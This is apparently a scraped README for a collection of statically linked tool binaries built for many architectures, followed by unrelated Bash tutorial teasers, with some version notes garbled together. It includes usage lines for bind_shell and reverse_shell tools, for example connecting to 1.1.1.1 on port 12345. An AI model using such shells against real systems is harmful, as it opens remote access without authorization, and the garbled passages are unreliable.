Prebuilt binaries for multiple architeture (arm, armeb, aarch64, aarch64_be, mips, mips1, mipsel, mipsel1, mips64, mips64el, powerpc, powerpc64, powerpc64le, riscv64, i586, x86_64)
All binaries are statically linked and stripped.
Please go to the Release page for downloads. *archName*_tools.zip contains tools’ binary (see Tools Section) for that specific arch, and allinone.zip contains all of it.
Or download single file directly from bin branch.
The source code and scripts can be found in the branch.
buildroot 2014.11 because they remove support after that version.buildroot 2019.11.1output/host, others are from make sdk)gdb 7.12.1, others are 8.3.1):( )./bind_shell will listen on port 3343 and ./bind_shell 6666 will listen on 6666../reverse_shell 1.1.1.1 12345 will connect to 1.1.1.1:12345; ./reverse_shell 1.1.1.1 will connect to 1.1.1.1:3343The config file for buildroot and github actions’ workflow file are in the src branch.
Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…
Introduction A self-signed SSL certificate is a certificate that is created and signed by the…
Introduction Debugging is an important part of Bash scripting. When a script does not work…
Introduction Cron jobs are used in Linux to run commands or Bash scripts automatically at…
Introduction Pipes are an important feature in Linux and Bash scripting. A pipe allows you…
Introduction The grep, awk, and sed commands are powerful text-processing tools in Linux. They are…